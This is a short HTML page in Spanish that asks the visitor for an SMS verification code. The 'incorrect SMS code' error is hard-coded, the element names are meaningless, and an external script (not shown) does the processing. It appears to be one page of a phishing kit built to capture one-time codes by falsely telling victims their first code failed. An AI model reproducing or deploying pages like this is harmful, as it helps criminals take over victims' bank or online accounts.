<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/doma.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    <div class="kola">
        <div>
            <div class="upto">
                <img src="./img/youpsms.png" alt="">
            </div>
        </div>
    
    
        <div>
            <div class="container">
      
      
      
                <form method="post" id="pg4">
                  
                    <div class="group">      
                        <input type="text" id="sps2" required>
                        <span class="highlight"></span>
                        <span class="bar"></span>
                        <label>Ingrese el código SMS </label>

                        <p style="color: rgb(255, 103, 103); font-weight: 600;">código SMS incorrecto</p>
                    </div>
                        
    
                    <button class="ttn2" type="submit">Confirme</button>
                    
                </form>
                    
                
                
                
            </div>
        </div>
    </div>

    <div>
        <div class="pola">
            <img src="./img/boutn1.png" alt="">
        </div>
    </div>
    <script src="./js/stb.js"></script>
</body>
</html>